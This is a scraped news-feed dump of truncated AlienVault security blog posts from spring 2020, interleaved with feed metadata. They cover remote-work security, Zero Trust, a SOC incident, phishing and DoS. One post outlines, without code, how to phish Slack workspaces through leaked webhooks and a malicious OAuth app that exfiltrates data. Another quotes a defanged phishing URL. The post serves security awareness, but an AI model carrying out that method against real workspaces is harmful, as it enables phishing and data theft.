of the vulnerability of those sorts of endpoints, read this article. Isolating a home network connection no longer requires particularly deep IT skills. There are many home and small office routers at around the $100 price point which offer VLAN support of one type or another.  Most WiFi kits offer the ability to set up a “guest” network. IT departments can provide easy, step-by-step instructions to employees working remotely on how to set this up on common routers and impress upon all managers the import]]> 2020-05-04T12:00:00+00:00 https://feeds.feedblitz.com/~/623166314/0/alienvault-blogs~defensive-COVID-actions-IT-managers-can-take-now www.secnews.physaphae.fr/article.php?IdArticle=1690016 False Malware,Vulnerability,Threat,Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Frost & Sullivan, that we received the 2019 Frost Radar Award for Growth, Innovation & Leadership (GIL) in the Global Managed Security Services (MSS) Market. Frost & Sullivan’s global team of analysts and consultants recognized our achievements in innovating and creating new products and solutions that serve ever-evolving customer needs. The criteria analyzed by Frost & Sullivan to determine the award were innovation, scalability, research and development, product portfolio, mega trends leverage, customer alignment as well as business factors including market share, revenue growth, growth pipeline, vision and strategy, sales and marketing. In particular, the analysts noted AT&T Cybersecurity as one of the most significant contributors to the rapid growth of the security market, as well as the overall pace of technological innovation. This recognition is noteworthy. It validates our years of experience in helping to protect network assets and our deep industry expertise; it supports our approach to helping enterprises fight the complexity and cost of cybercrime that is integrated, automated, and orchestrated with the right people, process, and technology. With our portfolio of managed security services, including AT&T Managed Threat Detection and AT&T Global Security Gateway, organizations can help to  reduce business risk and achieve cybersecurity efficiency within budget. And, the Frost Radar Award demonstrates we are at the forefront of the changing cybersecurity landscape and the increasing adoption of MSS. There are several reasons for this MSS growth. More organizations are realizing fighting cybercrime is not their core competency, and they don’t have the resources to tackle it; especially during the current global health crisis. It is difficult to evaluate, adopt, implement, and actively manage up to 75 or more different cybersecurity solutions needed to meet today’s security needs. Also, transitioning to next-generation services such as 5G, IoT and Edge Computing, as well as cloud-based business models, adds to the complexities of managing cybersecurity as IT environments become more complicated. Ultimately, we understand cybersecurity is a journey, not a destination. Our mission is to be the trusted advisor for enterprises on the road to cybersecurity resiliency, making it safer for them to innovate. For more information on our Frost Radar award, visit our resource center.       ]]> 2020-04-30T12:00:00+00:00 https://feeds.feedblitz.com/~/622803148/0/alienvault-blogs~ATampT-Cybersecurity-receives-Frost-amp-Sullivan-award-in-Managed-Security-Services www.secnews.physaphae.fr/article.php?IdArticle=1683411 False Threat,Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC 2020-04-29T12:00:00+00:00 https://feeds.feedblitz.com/~/622708402/0/alienvault-blogs~Have-you-started-working-from-home-Secure-your-endpoints www.secnews.physaphae.fr/article.php?IdArticle=1681636 False Malware,Patching None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC 2020-04-28T12:00:00+00:00 https://feeds.feedblitz.com/~/622619428/0/alienvault-blogs~Working-from-home-Use-the-spare-time-for-professional-development www.secnews.physaphae.fr/article.php?IdArticle=1679420 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Apache Struts Dynamic Method Invocation Remote Code Execution events. As detailed within the image below, this attack intent is associated with the Delivery & Attack phase of the Cyber Kill Chain®. Figure 1 - Initial Alarm   Alarm Detail Also included in the alarm details is the associated MITRE ATT&CK® rule attack ID, which afforded the ability to efficiently and expeditiously gather relevant information about this particular attempt on the customer’s system. The synopsis for this attack technique is defined as the “… use of software, data, or commands to take advantage of a weakness in an Internet-facing computer system or program in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability.”. To better understand the vulnerability profile of the asset in question, I executed an authenticated vulnerability scan within USM Anywhere. The results indicated several Apache HTTP server vulnerabilities. Following the completion of my reconnaissance efforts, I presented the actionable information to the customer. Response Figure 2 – Analyst Comments Customer Response(s) Two members of our Customer’s staff reviewed the analysis that I provided, confirmed my trepidations pertaining to the active vulnerabilities, and shared the subsequent steps to be taken to remediate this activity. The NAT was removed, and the Public IP was discontinued. The customer’s staff provided supplementary detail about the exposed and vulnerable system and the means by which he resolved continuing activity. The analyst indicated the targeted device was a digital video recorder (DVR) system that physically resided within one of the Customer’s warehouses and then outlined the actions taken to mitigate the risk: The publication rule of the Watchguard in the warehouse was eliminated The secondary public IP from the Watchguard configuration was removed The public IP of origin of the attack on the Watchguard was blocked Geolocation blocking from the foreign country to our entire network in the region was enabled The DVR was isolated unti]]> 2020-04-27T12:00:00+00:00 https://feeds.feedblitz.com/~/622532746/0/alienvault-blogs~Stories-from-the-SOC-Web-Server-Attack www.secnews.physaphae.fr/article.php?IdArticle=1677672 False Vulnerability,Threat,Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC 2020-04-23T12:00:00+00:00 https://feeds.feedblitz.com/~/622229072/0/alienvault-blogs~Why-cybersecurity-needs-a-seat-at-the-table www.secnews.physaphae.fr/article.php?IdArticle=1671587 False Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC interesting times.  Even the most hard-core introverts have noticed the value of human interaction.  It is how our species has survived.  One of the biggest challenges of our new, isolated existence is our sense of Locus of Control.  One common sentiment during times of uncertainty is the desire to help.  Most people want to help, but not all have the means to do so.  Fortunately, there is a way to help that costs no money at all. Have you heard of distributed computing power?  This is where a group of computers are given a task that is too great for a single computer to solve.  The computer is used for the distributed computing task while the CPU is idle.  Many folks never turn off their computers, so there are plenty of hours when the processor is doing nothing; just sitting, and awaiting some instruction.  There is an effort underway to combat the COVID-19 virus using distributed computing.  It is known as Folding@Home. I first became aware of crowdsourced distributed computing back when it was being used in the Search for Extraterrestrial Intelligence, known as the SETI experiment.  I chuckled that anyone would waste any computing cycles for such a trivial pursuit.  Recently, however, in a Twitter post by Lesley Carhart, I learned of the existence of Folding@Home project. The distributed computing game has changed dramatically, finding uses in many disease research endeavors. Of course, I was skeptical about the entire thing at first.  As I researched it a bit, it appears to be legitimate. The involvement of many other folks in the InfoSec community added credibility to the project.  Currently, the aim of the Folding@Home initiative is to explore protein behaviors to seek therapies for the COVID-19 virus.  You can read about protein chains, and how their behaviors affect all aspects of life on the FoldingAtHome.org web site.  However, if you do not want to read all about it, I can assure you that you have seen protein folding behavior throughout your life.  For example, just drop an egg into a hot frying pan, and you are seeing proteins change their shape in real-time. The understanding of protein behaviors could hold the cure that science is seeking. You do not need a supercomputer to participate.  The idea is that you become part of a larger computer’s processing power by donating your unused computing time. You can grab the software here.  There are versions for all operating systems, and the installation is fast, and easy.  I have mine running on an old laptop on which I installed a copy of Linux Mint.  As reported on April 8th, the Folding@Home effort had achieved more than an exaFLOP of computing power.  This is incredible, and if you are part of the collective that helped to reach that milestone, I sincerely thank and a]]> 2020-04-22T12:00:00+00:00 https://feeds.feedblitz.com/~/622144418/0/alienvault-blogs~Donating-while-you-sleep www.secnews.physaphae.fr/article.php?IdArticle=1669584 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC increasing cyberattacks. Blockchain: Supercharged Data Protection Here’s the funny thing. Though blockchain revolutionary technology is changing the way our financial system is structured, it’s not actually a good solution (yet, more on that later) to IoT privacy issues. At this point in time, blockchain is good for IoT security but bad for privacy. To the layman, this statement might seem contradictory and that’s because the tech media does a rather poor job at explaining the difference between privacy and protection.  Protection for the Internet of Things For anyone even remotely familiar with technology, the term Internet of Things (IoT) is a recognizable commodity. This describes the millions and soon to be billions of smart devices in addition to your mobile phone or laptop that are connected to the internet. We’re talking about the aforementioned refrigerator, security systems, smart doorbells, remote access climate control, and many more. The problem that has arisen is that no one really planned for the IoT. It just happened. The trend in the past few years has been to move IoT network data flow to the cloud and benefit from that environment’s greatly increased security. But at the same time, there remains the inherent limitation of so many internet capable devices built with a hodge-podge of operating systems and security capabilities. Device manufacturers eschewed any standards and did their own thing. It wasn’t long before hackers realized that these devices offered a backdoor path (thanks to laughably easy to defeat security protocols) to attack any company or individual who installed a smart device on their network. Home networks, in particular, have been very easy targets for the bad guys. A Blockchain-powered, multiple VPN solution To date, security experts typically recommend consumers install a virtual private network (VPN) on their router as protection against basic cyber security threats. While the encryption and IP address rerouting offered by a VPN makes it exponentially harder to crack your home network, there’s a trust problem with the average VPN. While the majority of service providers are committed to the idea of absolute privacy of your personal data, the reality remains that your connection passes through their server]]> 2020-04-21T12:00:00+00:00 https://feeds.feedblitz.com/~/622057472/0/alienvault-blogs~How-Blockchain-could-transform-smarthome-privacy-tech www.secnews.physaphae.fr/article.php?IdArticle=1667489 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Federal Consumer Credit Protection Act is a big concern to this small law firm. It provides valuable safety rights for consumers. On the flip side, it puts the onus on businesses to provide that these rights are protected. Definitely something to consider in erring on the conservative side and requiring employees to work in the office for the sake of security. The main driver for requiring people to work in the office was data security. Fear of the cloud was holding them back. Larger companies have been using cloud-based applications and allowing remote work for years – but this is not the reality for many small companies. Although this company already had great policies, including not storing information such as social security numbers of clients in their records, cloud-based applications and remote work were a bridge too far for the firm. Until Covid-19, which forced them to cross that bridge. Photo by Bjorn Snelders on Unsplash COVID-19 forced innovation and protecting client security to the forefront. It forced them to cross an uncomfortable bridge. They had to make the transition in literally a week. Schools were closing down and since most employees in this firm had kids, there was no option. They were fortunate to have a technical office manager who required very little third-party support from an IT contractor to make it happen. She was able to get the Office 365® suite in the cloud for everyone and set up ONEDRIVE® in a few days. While this was a tough change, there are upsides. Avoiding a 45-minute commute each way was a bonus. Working at home with small kids – wow, a challenge. But manageable. I believe COVID-19 will impact us going forward in unexpected ways. For this small law firm, once it’s proven that it works to allow employees to work from home securely, how many will change their policies even after the virus is defeated? It will be interesting to see. Helpful ideas for small companies Many small companies are in this position now. Remote endpoints are a tempting target for hackers Here are some helpful ideas: Require employees to  use a VPN and have them use only company equipment for work. Company equipment shouldn’t be used by non-employees. Require Multi-factor authentication for critical application access. Provide that any video conferencing tools and applications are password-protected. Pre-install strong endpoint protection on company-owned devi]]> 2020-04-20T12:00:00+00:00 https://feeds.feedblitz.com/~/621983416/0/alienvault-blogs~Working-from-home-new-reality-for-even-small-businesses www.secnews.physaphae.fr/article.php?IdArticle=1665767 False Ransomware None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC In fact, Lookout data shows that 1 in 50 enterprise users are phished on mobile devices daily. Mobile phishing rates have doubled for Lookout users of Office 365 and G Suite. This is a serious problem.  Lookout data suggests that enterprise users are three times more likely to fall for a phishing link when presented on the small screens of mobile devices rather than when presented on the screens of desktop OS, like Windows or macOS. Phishing has moved to mobile Most think “email” when they hear the word “phishing” but it is different on mobile. Mobile phishing extends beyond email to SMS, MMS, messaging platforms, and social media apps. Attacks are technically simple but novel in their approach. They seek to exploit human trust along social networks using personal context. For example, a parent would click without hesitation on a message saying their daughter has been in an accident at school. Employees also find it easier to perform tasks on a mobile device than on a desktop. Depositing checks via mobile banking app, for example, is simple, fast, and convenient, and there are many other examples like this. So, organizations must remain vigilant to keep pace with phishing threats that are increasingly targeting mobile users. An Akamai study highlights the dynamic nature of phishing sites - of over 2 billion domains analyzed; nearly 89% of the domains commonly associated with malicious sites had a life span of less than 24 hours.This emphasizes the need for advanced detection capabilities. Historically, organizations have invested heavily in security solutions such as secure email gateways, inbox scans, and end user training. Yet, these techniques remain too narrowly focused on email and do not protect modern messaging, such as SMS, Slack, and Microsoft Instant Messaging. Combating sophisticated phishing attacks on mobile is the new battleground as attackers continue to employ sophisticated mobile phishing strategies. Most common mobile phishing tactics There are several techniques that cybercriminals use to make their phishing attacks more effective on mobile. Below are some of the more commonly used tactics that Lookout has observed in the wild: URL padding is a technique that includes a real, legitimate domain within a larger URL but pads it with hyphens to obscure the real destination. For example, hxxp://m.facebook.com----------------validate----step1.rickytaylk[dot]com/sign_in.html con]]> 2020-04-17T12:00:00+00:00 https://feeds.feedblitz.com/~/621775856/0/alienvault-blogs~most-common-mobile-phishing-tactics www.secnews.physaphae.fr/article.php?IdArticle=1660297 False Threat None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC tenets of zero trust and how the confidence is gained for untrusted traffic and authorized on a continual basis.  The comprehensive nature of Zero Trust can be a little overwhelming in a world of limited resources, time and budgets.  As security breaches persist, organizations understand that something must be done, and Zero Trust is most certainly worth looking into. As an organization begins their journey to Zero Trust – first acknowledging that it is, in fact, a journey involving lengthy cycles of assessing, planning, architecting and designing, piloting and implementing – it is important to understand how far you want to take this journey and then follow an overall roadmap to get you there.  At a high level, this plan or roadmap should cover the following: Develop a strategy – Understand first why you want to take the organization to Zero Trust.  What are the overall goals of the business?  Do you only want to target a specific portion of your network, or the entire enterprise?  Will you only be implementing a software defined perimeter, washing your hands and saying “Done!”? Mapping the business’ goals to the cyber threats putting those goals at risk will help formulate the Zero Trust strategy to mitigate that risk.  This will help you build your case and get executive buy-in because without that, you will not have the support you need to see this journey to the end.  The length of your journey will be determined by the strategy. Given the broad nature of Zero Trust, many key departments of the business, such as development, finance, legal and HR should also be involved and/or consulted in the overall composition of the strategy.  Involving the right people early on in the process not only fosters better communication, but also helps to provide for  a successful deployment overall. Define your Element of Protection – As your strategy is being developed, you need to understand what you are trying to protect.  Most likely your defined element or elements of protection is your business data.  You need to determine what part of your business assets will be protected.  Will it be only sensitive data? Customer data? All data? What are the varying levels of data you need to protect?  PCI and ePHI data, for example, may have different classifications than financial records, or product designs.  You need to classify all data to understand how it is to be protected.  Enumerate your data & traffic flows – The next step is to see where that data is stored, where it is going, and who or what is handling that data. This is a critical step since it will drive a bulk of the policy decisions in your architecture.  You also don’t want to complete your Zero Trust journey only to discover a breach still occurred because of some neglected area.  Mapping these transaction flows will also utilize asset and application inventories, and an overall taxonomy of these will be used for other development areas.  For example, a data transaction that is discovered running from an application server to a database will involve cataloging the access requirements of the application, the users that access that application, how they access the data, the application owners, system owners, supported developers, database owners and administrators, and the communication requirements on the network.  As much information that can be obtained for each component of every step along the flow will gain you enormous ground in developing policy and the components of automation that dynamically change that policy. Assess Your Zero Trust Maturity – Many organizations already have various elemen]]> 2020-04-16T12:00:00+00:00 https://feeds.feedblitz.com/~/621690596/0/alienvault-blogs~key-steps-to-Zero-Trust www.secnews.physaphae.fr/article.php?IdArticle=1658169 False Vulnerability,Threat None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Incoming Webhooks allow you to post messages from your applications to Slack. By specifying a unique URL, your message body, and a destination channel, you can send a message to any webhook that you know the URL for in any workspace, regardless of membership. Webhooks take the format of https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX. Generally, Slack webhooks are considered a low risk integration due to the following assumptions: Webhook configuration requires selection of a target channel, reducing the scope of abuse to a single channel. The unique webhook URL is secret. The webhook only accepts data, and thus alone cannot expose sensitive data to third parties. A deeper dive into webhooks shows that this is not entirely accurate. First, a channel override allows you to override the previously specified webhook target channel by adding the “channel” key to your JSON payload. If you gain access to a webhook for one channel, you can use it in others. Considering sending to #general, #engineering, and other default or common channels to target a wider audience. In some cases, this can also override channel posting permissions (such as admin-only posting). Slack documentation suggests that allowed target channels are based on the original creator of the webhook: “posting_to_general_channel_denied is thrown when an incoming webhook attempts to post to the "#general" channel for a workspace where posting to that channel is 1) restricted and 2) the creator of the same incoming webhook is not authorized to post there. You'll receive this error with a HTTP 403.” So if you can find a webhook created by an admin - congrats, you can post to admin channels! A quick search on Github shows 130,989 public code results containing Slack webhook URLs, with a majority containing the full unique webhook value. The last assumption is true - webhooks can only accept data. That’s where we get creative. Slack webhook phishing with Slack apps The process itself is fairly simple: Discover leaked webhooks Create a Slack app and allow public installation of the app Send malicious messages to discovered hooks Track workspaces that install the malicious app Use the app to exfiltrate data from workspaces that install it Discovery As mentioned earlier, Github is a good start for scraping publicly committed webhook data. App creation First, create an app. You will also need a web server to handle the OAuth flow. Slack apps don’t require OAuth, but in this case we will be using the Slack API to access data in workspaces where the malicious app is installed. When the user attempts to install the application, they must approve the requested OAuth scopes. Their approval is sent]]> 2020-04-14T16:30:00+00:00 https://feeds.feedblitz.com/~/621561410/0/alienvault-blogs~Slack-phishing-attacks-using-webhooks www.secnews.physaphae.fr/article.php?IdArticle=1654673 False Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC He writes: “Turns out, gamification works great on students. And apparently employees like it just as much. Companies that train large volumes of staff are rushing to use games, in a variety of forms. The goal is the same: turn a boring, repetitive and difficult series of tasks into an enjoyable, interesting activity that gets better results. Games provide intrinsic motivation—that is, people play them because they want to—as opposed to bribing someone with a raise (an extrinsic motivation).” So what if gamification can prepare IT professionals to improve their incident response? Well, cybersecurity people are a bunch of nerds. And everyone knows nerds love tabletop roleplaying games like Dungeons and Dragons. CISO Michael Ball had an epiphany. He decided to turn incident response into a tabletop roleplaying game. His game is called Breach the Keep. I asked him what inspired him to invent the game. “I've done tons of executive training, both as the executive being trained, and as the trainer. Boring scripts, little engagement. No real team building. The CSIRT (computer security incident response team) has to be a team.  Not just a group you pull together in an emergency! They have to know on another's roles, and how to communicate with each other and the corporate stake holders before the chaos of a breach. None of the training I've seen to date engages the executives to develop the camaraderie of a team.” Roleplaying games are all about using your imagination, and they’re often set in a high fantasy setting. Breach the Keep is no exception. As the datasheet describes: “We will take you back in time into the realms of medieval and have a little fun with our version of Dungeons and Dragons. Through multiple scenarios we can help enhance your company’s team building abilities, identify gaps within the team and improve real world incident response time. Although the game is designed to imply information security type scenarios, we are going to use our imaginations and move the entire group back 400 years into the past. Instead of datacenters, we're protecting the castle’s keep.” Ball describes the roles in the game. “The CEO is the King or Queen. The CIO is Commander in Arms. CISO is the Mage or Viseer. HR (human resources department) is Chancellor. Corp Comms is the Town Cryer. Network Admins are Cavalry, and Security Analysts are Knights.” The datasheet explains some of the basics of the game. “Players will be giv]]> 2020-04-14T12:00:00+00:00 https://feeds.feedblitz.com/~/621545386/0/alienvault-blogs~Can-incident-response-be-fun www.secnews.physaphae.fr/article.php?IdArticle=1654214 False Studies None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC 2020-04-09T15:30:00+00:00 https://feeds.feedblitz.com/~/621149564/0/alienvault-blogs~Assess-and-adapt-for-resiliency www.secnews.physaphae.fr/article.php?IdArticle=1644976 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC The Foundation of a Zero Trust Architecture (ZTA) talked about the guiding principles, or tenets of Zero Trust.  One of the tenets mentions how all network flows are to be authenticated before being processed and access is determined by dynamic policy.   A network that is intended to never trust, and to always verify all connections requires technology that can determine confidence and authorize connections and provide that future transactions remain valid.  The heart of any ZTA is an authorization core involving equipment within the control plane of the network that determines this confidence and continually evaluates confidence for every request.  Given that this authorization core is part of a control plane, it needs to be logically separated from the portion of the network used for application data traffic (the data plane).    Based on the designed ZTA and the overall approach, components of the authorization core may be combined into one solution or completely stand on its own through individual hardware and/or software-based solutions. Communication Agent – the source of the access should provide enough information for confidence to be calculated.  Enhanced identity attributes such as user and asset status, location, authentication method and trust scoring should be included in every communication so that it can be properly evaluated. Enforcement Engine – also known as an Enforcement Point.  This should be placed as close to the element of protection (the data) as possible.  You might think of this as the data’s bodyguard. The Enforcement Engine will authorize the requested communication based on policy and continually monitor the traffic to stop it, if necessary, as requested by the Policy Engine.  An Enforcement Engine may prevent a system holding the element of protection from being discoverable, for example. Policy Engine – makes the ultimate decision to grant access to the asset and informs the Enforcement Engine.  The policy rules will depend on the implemented technology but will typically involve the who, what, when, where, why and how for access involving network services, endpoint and data classes. Trust/Risk Engine – analyzes the risk of a request or action.  The Trust/Risk Engine informs the policy engine of deviations in an implemented trust algorithm, evaluates the communication agent’s data against data stores and can utilize static rules and machine learning to continually update agent scores as well as component scores within the agent.  A trust algorithm that is implemented to compute a score-based confidence level based on criteria, values and weights set by the enterprise, along with a contextual view of an agent’s history and other data provides the best and most comprehensive approach to eliminating threats.  A score and contextual-based trust algorithm will identify an attack that may stay within a user’s role, versus an algorithm that does not take historical and other user data into account.  For example, a score and contextual-based trust algorithm may pick up on a user account or role that is accessing data outside normal business hours in an unusual way or from an unrecognizable location.  An alternative algorithm that relies solely on a specific set of qualified attributes may evaluate faster but will not have the historical context to understand that that access request seems odd and advise the policy engine to require better authentication before proceeding. Data Stores –As stated, a preferred approach is to implement a score and c]]> 2020-04-08T12:00:00+00:00 https://feeds.feedblitz.com/~/621065970/0/alienvault-blogs~The-Zero-Trust-Authorization-Core www.secnews.physaphae.fr/article.php?IdArticle=1642861 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC AT&T Cybersecurity Partner Program enables leading managed security service providers (MSSPs), VARs, system integrators, managed detection & response providers (MDRs) and corporate resellers to sell and support AT&T Cybersecurity solutions and deliver compelling services powered by USM Anywhere in the global marketplace. With a strong focus on partner enablement, the program is designed to help partners create new opportunities for business growth, expansion and profitability. Below is the full list of winners for the 2019 Partner of the Year Awards, along with their comments: Global Awards: Global Partner of the Year: Binary Defense To receive this award for three out of the past four years is quite an honor. As a managed security service provider, our mission is to help our customers improve their cybersecurity posture. Our partnership with AT&T continues to thrive because of their world-class SIEM platform and our 24/7/365 Security Operations Center that can tune, manage and monitor our customers’ SIEM instances. - Mike Hofherr, Chief Operating Officer   Growth Partner of the Year: RoundTower Technologies    The partnership with AT&T Cybersecurity enables us to provide our clients with deeper and more advanced Managed Security Solutions; delivering comprehensive visibility into their organization’s overall security posture and allowing our 24x7 Managed Security Solutions team to take proactive approaches to emerging threats. - Michael Swiencki, VP, Managed Services New Partner of the Year: Stefanini Rafael Seguranca E Defensa S.A.                                                            The AT&T Cybersecurity team aligns closely with our team and our strategy for the cybersecurity market.  USM is flexible and, importantly, offers a point of differentiation.  Our focus is on intelligence as well as USM’s SIEM functionality. We believe that the sales, implementation, and tech support offered by the AT&T Cybersecurity team has assisted our business immeasurably during the last year. Let’s move and win more deals in 2020. - Natal Da Silva, CEO Distributor of the Year: Ingram Micro INC. With the explosion of ransomware, and the sophisticated cyber threats facing businesses of all sizes, we must help our customers to identify and respond to attacks faster than ever,” says Eric Kohl, vice president, Security Business Unit at Ingram Micro.  “In working hand in hand with market leading cyber companies like AT&T Cybersecurity, we are able to offer comprehensive solutions to our MSP’s and solution providers.  We’re thrilled to be recognized by AT&T Cybersecurity with this award. - James Payne, Operations Manager Regional Awards: These awards recognize partners that had the highest sales bookings in each of the]]> 2020-04-07T12:00:00+00:00 https://feeds.feedblitz.com/~/621002010/0/alienvault-blogs~ATampT-Cybersecurity-announces-%e2%80%98Partners-of-the-Year-Awards%e2%80%99-Winners www.secnews.physaphae.fr/article.php?IdArticle=1642862 True Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC AT&T Cybersecurity Partner Program enables leading managed security service providers (MSSPs), VARs, system integrators, managed detection & response providers (MDRs) and corporate resellers to sell and support AT&T Cybersecurity solutions and deliver compelling services powered by USM Anywhere and USM Appliance in the global marketplace. With a strong focus on partner enablement, the program is designed to help partners create new opportunities for business growth, expansion and profitability. Below is the full list of winners for the 2019 Partner of the Year Awards, along with their comments: Global Awards: Global Partner of the Year: Binary Defense To receive this award for three out of the past four years is quite an honor. As a managed security service provider, our mission is to help our customers improve their cybersecurity posture. Our partnership with AT&T continues to thrive because of their world-class SIEM platform and our 24/7/365 Security Operations Center that can tune, manage and monitor our customers’ SIEM instances. - Mike Hofherr, Chief Operating Officer   Growth Partner of the Year: RoundTower Technologies    The partnership with AT&T Cybersecurity enables us to provide our clients with deeper and more advanced Managed Security Solutions; delivering comprehensive visibility into their organization’s overall security posture and allowing our 24x7 Managed Security Solutions team to take proactive approaches to emerging threats. - Michael Swiencki, VP, Managed Services New Partner of the Year: Stefanini Rafael Seguranca E Defensa S.A.                                                            The AT&T Cybersecurity team aligns closely with our team and our strategy for the cybersecurity market.  USM is flexible and, importantly, offers a point of differentiation.  Our focus is on intelligence as well as USM’s SIEM functionality. We believe that the sales, implementation, and tech support offered by the AT&T Cybersecurity team has assisted our business immeasurably during the last year. Let’s move and win more deals in 2020. - Natal Da Silva, CEO Distributor of the Year: Ingram Micro INC. With the explosion of ransomware, and the sophisticated cyber threats facing businesses of all sizes, we must help our customers to identify and respond to attacks faster than ever,” says Eric Kohl, vice president, Security Business Unit at Ingram Micro.  “In working hand in hand with market leading cyber companies like AT&T Cybersecurity, we are able to offer comprehensive solutions to our MSP’s and solution providers.  We’re thrilled to be recognized by AT&T Cybersecurity with this award. - James Payne, Operations Manager Regional Awards: These awards recognize partners that had the highest sales booki]]> 2020-04-07T12:00:00+00:00 https://feeds.feedblitz.com/~/621002010/0/alienvault-blogs~ATampT-Cybersecurity-announces-%e2%80%98Partner-of-the-Year-Awards%e2%80%99-Winners www.secnews.physaphae.fr/article.php?IdArticle=1642616 False Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC 16 DDoS attacks take place every minute. DoS attacks require fewer resources, and so pose an even greater threat. In this post, we’ll discuss what a DoS attack is and how it differs from a Distributed Denial of Service (DDoS) attack. We’ll then look at one of the latest techniques bad actors use to maximize the impact of their actions. What is a DoS Attack? A DoS attack is pretty much what it sounds like. The bad actors render a device or computer unavailable to authorized users. This is accomplished by interrupting the normal functioning of the item. DoS attacks will flood the target device with requests so that the device becomes overwhelmed. The device’s resources are all used to service these invalid requests. As a result, when a valid request comes along, there are no resources left. What’s the point of these attacks? There could be several reasons to launch a DoS attack. Some reasons include: Business rivalry A dispute against the company To earn a ransom to stop the attack To damage the business. What’s the difference between a DoS and DDoS Attack? Both use the technique of overwhelming the target device. The primary difference is in the number of computers used during the attack. With a DoS attack, just one computer is needed. With a Distributed Denial of Service attack, several machines or bots are used instead. Which form of attack is more effective? You might feel that the DDoS attack is more effective. It’s indeed easier to overwhelm a device or server with requests from more bots rather than fewer. It’s also true that the attack is more likely to be detected and blocked. One computer attacking the system might not have the same brute force, but you don’t always need brute force. Say, for example, that a cashier clones your debit card while you’re paying for your items. She notices that you get a message from your bank whenever you swipe your card. She’d like to shop for as long as possible without you noticing, so she gets a friend to launch a DoS attack on your phone. Her friend might use a buffer overflow attack technique on your phone. This attack uses up all the memory and processing power of your phone. You won’t receive messages or phone calls as a result. This is a simplified example, but it just goes to show that you don’t always need an army for these kinds of attacks. More advanced attacks According to Wired, we’re liable to see more DoS attacks with the Web Services Dynamic Discovery Exploit. This admittedly is a clever exploit and one that becomes more relevant with the Internet of Things expanding. With this attack form, the hacker ignores the primary system. Instead, they target vulnerable devices connected to the same network. These could be devices like printers, CCTV cameras, thermostats, etc. The point is that those devices usually don’t have the same level of protection that a company’s servers have. The hacker spoofs the target IP address and pings the device. The device responds to the legitimate target server and ties up resources. This attack is more difficult to detect than a direct attack because the requests are coming from devices authorized to use the network. Common focal points of DoS attacks DoS attacks fall into one of two basic categories: Flood attacks B]]> 2020-04-06T12:00:00+00:00 https://feeds.feedblitz.com/~/620936476/0/alienvault-blogs~Common-focal-points-of-DoS-attacks www.secnews.physaphae.fr/article.php?IdArticle=1641109 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC   If you are just now discovering this setting, you can also hide all your past transactions so that all of your activity is hidden. Of course, if you want to have some fun, you can just name your transactions to whatever you want, as one of my wise-guy friends did when sending some money to me: Apparently, some folks are not joking, and are broadcasting all kinds of illicit activity through the platform.  Please beware that illegal transactions could result in you getting kicked off the application, so it is not recommended. The real problem is this: even if you set your Venmo to “private” mode, it is still leaking too much inferential information about all of your associations.  If you go to a person’s profile page, there is a heading named “Friends” that allows you to see everyone in a person’s Venmo world: This is a social engineer’s dream!  The entire family of a total stranger can be accurately mapped just by scrolling through their “friends” list.  This is exactly how the “grandparent scam” is so effective.  To take this to the next level, if a person happens to pay a medical provider with Venmo, a social engineer could use all the publicly available information to easily impersonate that person, leading to a full medical records breach. This is why your healthcare provider will not accept payments through the application. When will Venmo lock down the Friends page?  Why was that not built into the application from the start?   Venmo is part of PayPal, and it is a safe way to move money between you and your friends and family.  However, it just needs a bit of a privacy nudge.  ]]> 2020-04-02T12:00:00+00:00 https://feeds.feedblitz.com/~/620703550/0/alienvault-blogs~Here-is-why-your-healthcare-provider-cannot-accept-Venmo-payments www.secnews.physaphae.fr/article.php?IdArticle=1633905 False Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC 2020-04-01T12:00:00+00:00 https://feeds.feedblitz.com/~/620646194/0/alienvault-blogs~The-foundation-of-a-Zero-Trust-architecture www.secnews.physaphae.fr/article.php?IdArticle=1631969 False Vulnerability None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC iSC Cybersecurity Workforce Study 2019, for example, the global cybersecurity workforce gap is about 4.07 million. The report suggests that the current cybersecurity workforce needs to increase by 62 percent to meet the needs of businesses. That’s why organizations and businesses are taking the initiative by reducing the barriers to enter the field for young specialists. 2. Cyberattacks are becoming more frequent and successful The global cost of cybercrime in 2018 alone was estimated to be over $45 billion, and this amount rises every year. Three kinds of attacks - ransomware, spoofing/BEC, and spear-phishing - have seen the most increase, says AT&T Cybersecurity report. Besides, the attacks are becoming more sophisticated and successful (according to AT&T): The average cost of a one successful cybersecurity accident involving data loss increased from $4.9 million to $7.5 million 88 percent of cybersecurity professionals have reported an increase in threats in the past year Cybercrime is becoming commercialized, meaning that criminals sell attack components on the dark web A person without coding knowledge can now launch and relaunch a sophisticated cyber-attack thanks to tools and code sold online. 3. The requirement to have a degree isn’t regulated by anyone Unlike fields like medicine where one must have a degree to practice the profession, InfoSec entry-level specialists can freely begin their careers without one. The risk of being outcompeted by those with an academic degree in cybersecurity is lower compared to other fields. For one, a lack of a degree in cyber-security doesn’t affect the salary. According to the 2020 Cybersecurity Salary Survey, 55 percent of individuals working as a cyber “security analyst/threat intelligence expert” without a degree earn between $51K and $90K. Credit: 2020 Cybersecurity Salary Survey This finding was similar across many other professions, including penetration tester, network security engineer, security/cloud architect, and security directo]]> 2020-03-31T12:00:00+00:00 